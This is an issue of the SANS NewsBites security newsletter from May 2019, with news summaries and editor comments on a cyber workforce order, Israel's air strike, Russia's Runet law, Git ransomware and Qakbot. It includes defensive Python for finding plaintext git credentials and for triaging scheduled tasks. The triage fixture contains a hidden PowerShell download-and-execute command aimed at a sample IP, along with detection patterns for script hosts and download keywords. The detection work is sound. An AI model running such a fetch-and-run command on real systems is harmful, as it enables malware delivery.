
SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.

Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.

Volume XXI - Issue #36

May 7, 2019

Finding Cyber Aptitude in the US - the Cyber Executive Order; Air Strike Response to Cyber Attack; Putin's Great Wall of Russia for Cyber

Students at 1,240 U.S. colleges (24% of all U.S. colleges) are participating in Cyber Fast Track, competing to show they have the aptitude and grit to win more than $2 million in scholarships for SANS classes as well as hundreds of thousands in scholarships at their schools. The deadline for entries is this Friday, May 10. More than 5,000 students (out of the 12,500 who have tried) have already done well enough to move into round two of the program. America's most desirable cybersecurity employers are planning internships for high performers, and the colleges appreciate the program because it identifies great talent in their own student bodies for part time jobs in IT and IT security at school.




SANS NewsBites                 May 7, 2019                 Vol. 21, Num. 036




  Cybersecurity Executive Order

  Israel Responded to Cyberattacks with Air Strike: Real-time Hybrid Warfare

  Putin Signs Law to Create Isolated Russian Internet


  "Cyber Event" Disrupted Power Grid Operations in Western US in March

  Git Ransomware

  Supply Chain Hackers Eroding Trust in Software Distribution Systems

  Qakbot Uses Obfuscation to Maintain Persistence

  International Law Enforcement Authorities Take Down Dark Web Marketplaces

  Agency Cybersecurity Leaders Response to Shared Services Policy

  Firefox and Certificate Expiration

  Google Access Transparency for Cloud Services

  Microsoft is Offering Free Election Security Tools




-- SANSFIRE 2019 | Washington, DC | June 15-22 | https://www.sans.org/event/sansfire-2019

-- SANS Amsterdam May 2019 | May 20-25 | https://www.sans.org/event/amsterdam-may-2019

-- SANS San Antonio 2019 | May 28-June 2 | https://www.sans.org/event/san-antonio-2019

-- SANS London June 2019 | June 3-8 | https://www.sans.org/event/london-june-2019

-- Enterprise Defense Summit & Training 2019 | Redondo Beach, CA | June 3-10 | https://www.sans.org/event/enterprise-defense-summit-2019

-- Security Operations Summit 2019 | New Orleans, LA | June 24-July 1 | https://www.sans.org/event/security-operations-summit-2019

-- SANS Cyber Defence Canberra 2019 | June 24-July 13 | https://www.sans.org/event/cyber-defence-canberra-2019

-- SANS Cyber Defence Japan 2019 | July 1-13 | https://www.sans.org/event/cyber-defence-japan-2019

-- SANS Rocky Mountain 2019 | Denver, CO | July 15-20 | https://www.sans.org/event/rocky-mountain-2019

-- SANS OnDemand and vLive Training

Get an iPad, Samsung Galaxy Tab A, or $250 Off with OnDemand or vLive training. Offer ends May 15.


-- Can't travel? SANS offers online instruction for maximum flexibility

-- Live Daytime training with Simulcast - https://www.sans.org/simulcast

-- Evening training 2x per week for 6 weeks with vLive | https://www.sans.org/vlive

-- Anywhere, Anytime access for 4 months with OnDemand format | https://www.sans.org/ondemand/

-- Single Course Training

SANS Mentor | https://www.sans.org/mentor/about

Community SANS | https://www.sans.org/community/


-- View the full SANS course catalog and Cyber Security Skills Roadmap



***************************  Sponsored By Splunk  ******************************

Take Your SIEM to the Cloud.  A SIEM solution is like a radar system. Without one, IT is flying blind and organizations are vulnerable to cyberthreats. But a cloud-based SIEM solution could add even more benefits to an organization's security defenses. Download Take Your SIEM to the Cloud to learn how to improve your security posture using a cloud-based SIEM. http://www.sans.org/info/212670




--Cybersecurity Executive Order

(May 2 & 3, 2019)

The goal of the recently issued White House Executive Order on cybersecurity is to develop a "superior cybersecurity workforce," according to an administration official. The order directs the Secretary of Homeland Security to establish a job rotation program that lets cybersecurity experts move between agencies. It directs the Office of Personnel Management (OPM) to compile a list of tests that can be used to evaluate federal employees and identify those with cybersecurity skills. It also calls for a cybersecurity competition open to government employees and members of the armed services.

[Editor Comments]

[Paller] There is a very big idea in the Executive Order. That is the aptitude testing. The Brits discovered two sources of extremely high talent that are ready and have not been tapped. One source is adults who are already employed in the workforce but not in IT roles and who have extraordinary aptitude for solving cyber security problems. The second is students in college or high school who never got introduced to tech who also have the curiosity and tenacity and problem-solving and quick learning that separates the great cyber security professionals from the ones who just keep doing what doesn't work. Aptitude identification programs for both groups worked wonderfully in the UK and have been tested at scale in the United States. Preliminary data shows they will work as well here as they do in the UK. The Federal government is leading the quest to make aptitude testing programs work, and the Executive Order shines a bright light on their promise. The key to the importance of aptitude testing is that a great number of people who are in the cyber security field do not have the natural aptitude to work on the front lines of cybersecurity -- identifying and excising intrusions. Their aptitude deficit leaves countries and companies deeply at risk. Programs that identify natural talent, combined with great training, are the shortest path to solving our country's high-end cyber security skills shortage.

UK success (adults): All You Need to Know about the Cyber Retraining Academy: https://www.infosecurity-magazine.com/news-features/all-you-need-cyber-retraining/

US test (adults): More than 1,500 feds applied for first Cyber Reskilling Academy cohort: https://www.fedscoop.com/cyber-reskilling-academy-1500-applicants/

Students: www.girlsgocyberstart.org and www.cyber-fasttrack.org

[Williams] The executive order seems to be a mixed bag. On the one hand, it highlights the need for aptitude assessments and retraining. That's extremely positive. On the other hand, it establishes a "president's cup" cybersecurity competition. I'm rather concerned that the results of this will be skewed against some classified organizations who must adapt to use unclassified tools and techniques in the competition.

Read more in:

Bank InfoSecurity: Trump Order Aims to Boost Federal Cybersecurity Workforce


The Register: White House issues Executive Order on cybersecurity, including hacker Hunger Games


Cyberscoop: Trump emphasizes federal cybersecurity workforce, education programs in new executive order


Threatpost: Researchers Weigh in on Trump's Cyber Workforce Executive Order


White House: Executive Order on America's Cybersecurity Workforce



--Israel Responded to Cyberattacks with Air Strike: Real-time Hybrid Warfare

(May 5 & 6, 2019)

The Israel Defense Forces (IDF) bombed a building it said housed Hamas cyber operatives who had attempted an attack that Israeli forces thwarted. The air strike is believed to be the first kinetic response carried out in real time against an ongoing cyberattack. In 2016, NATO formally recognized cyberspace as an operational domain alongside air, land, and sea.

[Editor Comments]

[Williams] This action puts many in the line of fire who really haven't been before. If the "cyber is a battlefield and anyone on the battlefield is a combatant" position is widely adopted, cyber defenders will be at risk of bodily harm too. In other words, don't just view this as part of the Hamas/IDF conflict - view it in the larger context of what it will mean if taken to include cyber defense operators as well.

Read more in:

Wired: What Israel's Strike on Hamas Hackers Means for Cyberwar


ZDNet: In a first, Israel responds to Hamas hackers with an air strike


CNBC: Israel says it bombed Hamas compound that committed cyberattacks


Softpedia: NATO Declares Cyber an Official Warfare Battleground, Next to Air, Sea and Land (June 2016)



--Putin Signs Law to Create Isolated Russian Internet

(May 2, 2019)

Russian President Vladimir Putin has signed the so-called Runet law, which allows Russia to run its segment of the Internet independently of the rest of the world. The stated goal of the law is to protect the stability of Russia's Internet in the event that foreign adversaries attempt to cut it off. The law takes effect in November; telecommunications operators must comply with its provisions starting in 2021.

[Editor Comments]

[Pescatore] Not really much detail on this, but it sounds more like an attempt to replicate the "Great Firewall of China" approach to censoring Internet access vs. some sort of security strategy. In fact, it seems like recycling of the old USSR communications restrictions that were lifted in 1987 or so. Four years later the Berlin Wall came down, and this strategy seems like an attempt to put back up the cyber version.

[Neely] Putin has a model that Russia could "pull the plug" on the rest of the Internet so Russia could survive a Cyber War, routing traffic through Russian exchange points when they are under threat. Given that Internet threats are a constant, expect traffic to always be routed through these exchange points, creating a model that will resemble the "Great Firewall of China" which facilitates enacting communication restrictions. There are better strategies for creating and securing defenses of critical resources.


[Murray] Recall when there were tanks in Red Square and the only Internet connection to Moscow was a dial connection through Finland. The value of a network is an exponential function of the numbers of nodes and potential connections. Attempts to limit the connections reduce the value by the same function.  

Read more in:

ZDNet: Putin signs Runet law to cut Russia's internet off from rest of world


The Hill: Putin signs controversial internet law


****************************  SPONSORED LINKS  ******************************

1) Ponemon Report: 2019 State of Password and Authentication Security Behaviors.  Read the surprising statistics. http://www.sans.org/info/212675

2) Take the 2019 SANS Integrated Incident Response Survey and enter for a chance to win a $400 Amazon gift card: http://www.sans.org/info/212680

3)  How is your organization responding to the threats that matter? Take this SANS survey and enter for a chance to win a $400 Amazon gift card: http://www.sans.org/info/212695




--"Cyber Event" Disrupted Power Grid Operations in Western US in March

(April 30, May 2 & 3, 2019)

An electric disturbance report (form OE-417) published by the US Department of Energy says that a "cyber event" disrupted power grid operations in California, Utah, and Wyoming on March 5. The event "did not impact generation, the reliability of the grid or cause any customer outages." It involved a denial-of-service condition caused by exploitation of a known vulnerability.

Read more in:

E&E News: 'Denial of service' attack caused grid cyber disruption: DOE


E&E News: OE-417 Electric Emergency and Disturbance Report - Calendar Year 2019 (see page 5: 03/05/2019) (PDF)


SC Magazine: Denial of service event impacted U.S. power utility last month


Tech Crunch: 'Denial of service condition' disrupted US energy company operations


CNBC: An alarmingly simple cyberattack hit electrical systems serving LA and Salt Lake, but power never went down


Vice: A 'Cyber Event' Disrupted the Power Grid in California and Wyoming, But Don't Panic Just Yet



--Git Ransomware

(May 3, 2019)

Attackers have been wiping source code repositories hosted on GitHub, GitLab, and Bitbucket: a repository's commits are removed and replaced with a single commit holding a text-file ransom note that demands Bitcoin. Nothing is encrypted, so "ransomware" is a loose description. It is not clear how the attackers gained access to the affected accounts. Because the wipe rewrites the branch history on the hosting service rather than destroying every copy, a developer with an up-to-date local clone can usually restore the repository by pushing that clone back.
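The reports above do not say how the accounts were taken over. Whatever the vector, one thing worth checking across developer machines and build servers is git configuration that carries credentials: `git clone https://user:token@host/...` stores that URL, secret included, in `.git/config` as plaintext, `credential.helper store` writes secrets to `~/.git-credentials`, and `http.extraHeader` can carry an Authorization header. The Python below is an added example, not code from any of the articles cited here; the config text, host names and secrets in it are constructed for illustration.

```python
"""Find plaintext git credentials in .git/config text.

Added example (not code from any of the reports above). The config text,
host names and secrets below are constructed for illustration.
"""
import os
import re
from urllib.parse import urlsplit, urlunsplit

SECTION_RE = re.compile(r'^\s*\[(?P<name>[^\]]+)\]\s*$')
KEY_RE = re.compile(r'^\s*(?P<key>[A-Za-z][\w-]*)\s*=\s*(?P<value>.*?)\s*$')

# Constructed sample: what `git clone https://alice:hunter2@...` leaves behind.
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
[remote "origin"]
\turl = https://alice:hunter2@gitlab.example.com/team/app.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
\turl = https://deploytoken@github.com/team/app.git
\tfetch = +refs/heads/*:refs/remotes/mirror/*
[remote "ssh"]
\turl = git@bitbucket.org:team/app.git
[http]
\textraHeader = Authorization: Basic YWxpY2U6aHVudGVyMg==
[credential]
\thelper = store
"""


def parse_git_config(text):
    """Yield (section, key, value) triples; git allows repeated keys, so no dict."""
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group("name").strip()
            continue
        m = KEY_RE.match(line)
        if m and section is not None:
            yield section, m.group("key").lower(), m.group("value")


def redact_url(url):
    """Replace the userinfo part of a URL with *** but keep host, port and path."""
    parts = urlsplit(url)
    host = parts.netloc.rsplit("@", 1)[-1]
    return urlunsplit((parts.scheme, "***@" + host, parts.path, parts.query, parts.fragment))


def find_embedded_credentials(config_text):
    """Return (section, problem, redacted evidence) for every plaintext secret found."""
    findings = []
    for section, key, value in parse_git_config(config_text):
        if key == "url":
            parts = urlsplit(value)
            # scp-style git@host:path and ssh://git@host carry a user name, not a secret
            if parts.scheme not in ("http", "https"):
                continue
            if parts.password is not None:
                findings.append((section, "password in URL", redact_url(value)))
            elif parts.username:
                findings.append((section, "token or user name in URL", redact_url(value)))
        elif section == "credential" and key == "helper" and value.split()[:1] == ["store"]:
            findings.append((section, "credential.helper store keeps ~/.git-credentials in plaintext",
                             "helper = store"))
        elif key == "extraheader" and value.lower().startswith("authorization:"):
            findings.append((section, "Authorization header in config", "Authorization: ***"))
    return findings


def scan_tree(root):
    """Walk a directory tree and report findings per .git/config file."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".git" and "config" in filenames:
            path = os.path.join(dirpath, "config")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = find_embedded_credentials(fh.read())
            if found:
                report[path] = found
            dirnames[:] = []  # no need to descend into the object store
    return report


if __name__ == "__main__":
    for section, problem, evidence in find_embedded_credentials(SAMPLE_CONFIG):
        print(f"[{section}] {problem}: {evidence}")
```

Run `scan_tree("/home")` (or a build agent's workspace root) to sweep real checkouts; the evidence strings are redacted so the report itself does not become another copy of the secret. Anything it finds should be rotated, not just deleted, since the value has already been on disk in the clear.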

Read more in:

The Register: Mystery Git ransomware appears to blank commits, demands Bitcoin to rescue code


Bleeping Computer: Attackers Wiping GitHub and GitLab Repos, Leave Ransom Notes


Vice: Someone Is Hacking GitHub Repositories and Holding Code Ransom



--Supply Chain Hackers Eroding Trust in Software Distribution Systems

(May 3, 2019)

Over the past three years, a hacking group known by several names, including Barium, ShadowHammer, and Wicked Panda, has compromised the software distribution systems of at least six companies. Its approach is to infect large numbers of users through these channels and then sift through the victims for the small number of espionage targets it actually wants. Had the group chosen to push ransomware through the same channels, the results would have been devastating.

[Editor Comments]

[Pescatore] This is a good article to use as the basis of a table top exercise to demonstrate to CEOs and Boards of Directors why the security team should be involved in procurement/supply chain/merger and acquisition decisions. Companies that have done so, and who have invested in the tools and skills to actually make sure software products and services have been assessed for malicious capabilities before acquisition, have been able to avoid or minimize damage from similar supply chain attacks.

Read more in:

Wired: A Mysterious Hacker Group is on a Supply Chain Hijacking Spree



--Qakbot Uses Obfuscation to Maintain Persistence

(May 2 & 3, 2019)

A new variant of the Qakbot (Qbot) banking trojan uses new obfuscation techniques to evade detection and make itself harder to remove from infected devices. Victims are first infected by a dropper. The dropper then creates a scheduled task that downloads the Qakbot components in separately encrypted pieces, which are reassembled on the host. Qakbot has a long history of using scheduled tasks to maintain a foothold on infected devices.
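Scheduled-task persistence of this kind leaves a clear trace: when task-creation auditing is enabled, Windows records Security event 4698 with the new task's full XML. The Python below is an added example, not code from Talos or any other source cited here; it pulls the Exec action and repetition interval out of constructed 4698 records and flags tasks that combine a script host, a payload under a user-writable path, download-style arguments, or a very short repeat interval. The task names, paths, file name and IP address in it are made up for illustration and are not Qakbot indicators.

```python
"""Triage Windows Security event 4698 (scheduled task created) for the
download-and-reassemble persistence pattern.

Added example, not code from Talos or any other report cited here. The task
names, paths, IP address and XML below are constructed for illustration and
are not real Qakbot indicators.
"""
import re
import xml.etree.ElementTree as ET
from ntpath import basename

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "regsvr32.exe", "rundll32.exe", "cmd.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata|users\\public)\\", re.I)
DOWNLOAD_HINTS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|https?://|urlcache", re.I)
ISO_DURATION = re.compile(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?")

TASK_XML_BENIGN = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Actions><Exec><Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -o</Arguments></Exec></Actions>
</Task>"""

# Stager: a script host runs a dropped .js from the user's profile every five minutes.
TASK_XML_STAGER = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2019-05-01T09:00:00</StartBoundary>
    <Repetition><Interval>PT5M</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>C:\Windows\System32\wscript.exe</Command>
    <Arguments>"C:\Users\bob\AppData\Roaming\Microsoft\fnqvyd.js"</Arguments></Exec></Actions>
</Task>"""

# Downloader: PowerShell pulls the next stage from a documentation-range address hourly.
TASK_XML_DOWNLOADER = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><StartBoundary>2019-05-01T09:00:00</StartBoundary>
    <Repetition><Interval>PT1H</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>powershell.exe</Command>
    <Arguments>-w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.txt')"</Arguments></Exec></Actions>
</Task>"""

# Constructed 4698-style records (a 4702 'task updated' record is included to show it is skipped).
SAMPLE_EVENTS = [
    {"EventID": 4698, "SubjectUserName": "SYSTEM", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": TASK_XML_BENIGN},
    {"EventID": 4698, "SubjectUserName": "bob", "TaskName": r"\Update", "TaskContent": TASK_XML_STAGER},
    {"EventID": 4698, "SubjectUserName": "bob", "TaskName": r"\OneDrive Sync", "TaskContent": TASK_XML_DOWNLOADER},
    {"EventID": 4702, "SubjectUserName": "bob", "TaskName": r"\Update", "TaskContent": TASK_XML_STAGER},
]


def parse_task_xml(xml_text):
    """Pull the Exec command, its arguments and any repetition interval out of task XML."""
    command, arguments, interval = "", "", None
    for el in ET.fromstring(xml_text).iter():
        local = el.tag.rsplit("}", 1)[-1]  # strip the task-schema namespace
        text = (el.text or "").strip()
        if local == "Command":
            command = text
        elif local == "Arguments":
            arguments = text
        elif local == "Interval":
            interval = text
    return command, arguments, interval


def interval_minutes(iso_duration):
    """Convert an ISO 8601 duration such as PT5M into minutes (None if absent or unparsable)."""
    m = ISO_DURATION.fullmatch(iso_duration or "")
    if not m:
        return None
    days, hours, mins, secs = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + mins + secs / 60


def triage_task(xml_text):
    """Return the reasons a task looks like staged-download persistence (empty if none)."""
    command, arguments, interval = parse_task_xml(xml_text)
    reasons = []
    exe = basename(command).lower()
    if exe in SCRIPT_HOSTS:
        reasons.append(f"script host or LOLBin: {exe}")
    if USER_WRITABLE.search(command + " " + arguments):
        reasons.append("runs content from a user-writable path")
    if DOWNLOAD_HINTS.search(arguments):
        reasons.append("arguments fetch remote content")
    mins = interval_minutes(interval)
    if mins is not None and mins <= 15:
        reasons.append(f"repeats every {mins:g} min")
    return reasons


def triage_task_events(events):
    """Flag 4698 events that trip at least two rules; a lone cmd.exe task is too noisy."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4698:
            continue
        reasons = triage_task(ev["TaskContent"])
        if len(reasons) >= 2:
            hits.append((ev["TaskName"], reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in triage_task_events(SAMPLE_EVENTS):
        print(name, "->", "; ".join(reasons))
```

Two weak signals together are the threshold here; tune it against your own baseline of legitimate tasks. Also feed 4702 (task updated) records through the same rules, since a task that is created looking benign can be edited into a downloader later.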

[Editor Comments]

[Murray] If your systems are compromised, they are compromised. There is little to choose among the capabilities of the malicious software. We must know what software we expect to be on our systems if we expect to recognize that which we do not want.  

Read more in:

Talos Intelligence: Qakbot levels up with new obfuscation techniques


SC Magazine: Qakbot upgrade includes new obfuscation technique


Bleeping Computer: Qakbot Assembles Itself from Encrypted Halves to Evade Detection



--International Law Enforcement Authorities Take Down Dark Web Marketplaces

(May 3 & 6, 2019)

Two dark web marketplaces - the Wall Street Market (WSM) and the Silkkitie or Valhalla Marketplace - have been taken down in an international coordinated effort involving Europol and German, Dutch, US, Finnish, and French authorities. Three suspects are in custody in Germany; they face charges in the US related to their alleged operation of the WSM.

Read more in:

Europol: Double Blow to Dark Web Marketplaces


KrebsOnSecurity: Feds Bust Up Dark Web Hub Wall Street Market


MeriTalk: DoJ Charges Three Germans for Operating Dark Web Marketplace


Justice: 3 Germans Who Allegedly Operated Dark Web Marketplace with Over 1 Million Users Face U.S. Narcotics and Money Laundering Charges



--Agency Cybersecurity Leaders Response to Shared Services Policy

(May 1, 2019)

On April 26, the US Office of Management and Budget (OMB) issued a new shared services policy that designates the Department of Homeland Security (DHS) as the Quality Service Management Office (QSMO) in charge of cybersecurity acquisition and standards. At a roundtable discussion last week, information security leaders at US government agencies said they are fine with the designation provided DHS works with agencies individually rather than imposing one-size-fits-all requirements.

Read more in:

Nextgov: Agency Cyber Pros Welcome DHS' Leadership If It's Not One-Size-Fits-All


Nextgov: Exclusive: What OMB's New Shared Services Policy Will Mean for Modernization



--Firefox and Certificate Expiration

(May 5, 2019)

Mozilla has released Firefox 66.0.4 to fix a problem caused by the expiry of an intermediate certificate in the chain Mozilla uses to sign add-ons: with their signatures no longer validating, Firefox disabled most extensions and plug-ins. Users should update to Firefox version 66.0.4.

[Editor Comments]

[Neely] The problem manifests itself by unexpectedly disabling extensions, and users cannot reinstall or re-enable them. Enterprises need to deploy version 60.6.2 ESR, or enable Firefox Studies, which also requires enabling sending telemetry data back to Mozilla, to resolve the problem.

Read more in:

ZDNet: Mozilla releases Firefox 66.0.4 with fix disabled add-ons issue


Bleeping Computer: Firefox 66.0.4 Released With Fix for Disabled Addons



--Google Access Transparency for Cloud Services

(March 2019)

Google's Access Transparency service gives Google Cloud Platform customers logs of the actions Google staff take on the customer's data and resources, for example when handling a support request. Access Transparency is supported on six GCP services; there are plans to add support for more.

[Editor Comments]

[Pescatore] This is a nice step forward in visibility, one that should be budgeted into the acquisition cost of GCP and then all cloud services, as Google competitors announce similar offerings. This is not full visibility into what Google is doing at the bottom layer of virtualization but gives you the ability to examine (and export into SIEM or other analysis packages) all Google admin actions directly related to your services. It requires certain levels of Google support packages and roles - it is not free, thus the need to push for IT to budget in that cost as part of acquiring the services.

[Neely] Increased transparency to what CSP System Administrators are doing with your account allows equivalent visibility to actions taken by staff on internally hosted systems. Microsoft is putting a toe in the water with their Customer Lockbox for Office 365. Google's offering is available only to customers with Gold, Platinum, Enterprise, four or more Development roles, four or more Production roles, or a combination of the two role-based support agreements.

[Murray] As with other such services, pay for them only if you look at the data. Continue to pay only if you find intelligence in the data on which you take action.

Read more in:

Search Cloud Computing: Google tool signals move to greater cloud transparency


Google: Access Transparency



--Microsoft is Offering Free Election Security Tools

(May 6, 2019)

Microsoft plans to release a free open-source software development kit that can be used to help improve election security. ElectionGuard will be available later this summer to election officials and election technology suppliers. ElectionGuard can be used to allow third-party election result validation and to allow voters to check that their ballots were counted correctly.

[Editor Comments]

[Pescatore] Microsoft's partner in this, a small research company called Galois, has been funded by DARPA in this area since 2017 under the System Security Through Integrated Hardware and Firmware program. If the ElectionGuard software is released on GitHub soon, it will be good to see it banged on by security researchers and at the DefCon Voting Village in August. Microsoft also listed as a partner Election Systems & Software, the election system company who last year admitted that from 2000 - 2006 they included modems and pcAnywhere remote access software in systems they sold that were used to program voting machines and tabulate votes! States and localities that procure voting systems should look for the results of testing and integration of technology like ElectionGuard from all system vendors.

[Neely] Tools to help secure systems and validate the results are definitely needed. Resources to update and secure voting systems will need to be identified and budgets will need to be adjusted for systems that were intended to operate without significant change for 20-30 years.


[Murray] While there are thousands of jurisdictions conducting our elections, there are only a handful selling hardware and software into this market. Seems as though this is a more efficient place to focus security efforts. The vendors do not have a good security record. One would like to see those who are building ATMs and gambling devices in the market.

Read more in:

Microsoft: Protecting democratic elections through secure, verifiable voting


Cyberscoop: Microsoft pushes open-source software kit to election agencies, voting-tech vendors




Decoding UTF-16 in UDF Files


Git Ransomware


DLink Ransomware Patch (German)


Jenkins Plugin Vulnerabilities


Malicious WPAD Domains


VMWare Fusion 11 Guest VM RCE


Hackers Are Using Bad Passwords Too


Amazon S3 Discontinues Path Style Access



The Editorial Board of SANS NewsBites


John Pescatore was Vice President at Gartner Inc. for fourteen years. He became a director of the SANS Institute in 2013. He has worked in computer and network security since 1978 including time at the NSA and the U.S. Secret Service.

Shawn Henry is president of CrowdStrike Services. He retired as FBI Executive Assistant Director responsible for all criminal and cyber programs and investigations worldwide, as well as international operations and the FBI's critical incident response.

Suzanne Vautrinot was Commander of the 24th Air Force (AF Cyber) and now sits on the board of directors of Wells Fargo and several other major organizations.

Ed Skoudis is co-founder of CounterHack, the nation's top producer of cyber ranges, simulations, and competitive challenges, now used from high schools to the Air Force. He is also author and lead instructor of the SANS Hacker Exploits and Incident Handling course, and Penetration Testing course.

Michael Assante was Vice President and Chief Security Officer at NERC, led a key control systems group at Idaho National Labs, and was American Electric Power's CSO. He now leads the global cyber skills development program at SANS for power, oil & gas and other critical infrastructure industries.

Mark Weatherford is Chief Cybersecurity Strategist at vArmour and the former Deputy Under Secretary of Cybersecurity at the US Department of Homeland Security.

Stephen Northcutt teaches advanced courses in cyber security management; he founded the GIAC certification and was the founding President of STI, the premier skills-based cyber security graduate school, www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.

William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.

Lee Neely is a Senior Cyber Analyst at Lawrence Livermore National Laboratory, SANS Analyst and Mentor. He has worked in computer security since 1989.

Rob Lee is the SANS Institute's top forensics instructor and director of the digital forensics and incident response research and education program at SANS (computer-forensics.sans.org).

Tom Liston is member of the Cyber Network Defense team at UAE-based Dark Matter. He is a Handler for the SANS Institute's Internet Storm Center and co-author of the book Counter Hack Reloaded.

Jake Williams is a SANS course author and the founder of Rendition Infosec, with experience securing DoD, healthcare, and ICS environments.

Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.

Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He leads SANS' efforts to raise the bar in cybersecurity education around the world.

David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.

Gal Shpantzer is a trusted advisor to CSOs of large corporations, technology startups, Ivy League universities and non-profits specializing in critical infrastructure protection. Gal created the Security Outliers project in 2009, focusing on the role of culture in risk management outcomes and contributes to the Infosec Burnout project.

Alan Paller is director of research at the SANS Institute.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS operations manager and serves as production manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription visit https://www.sans.org/account/create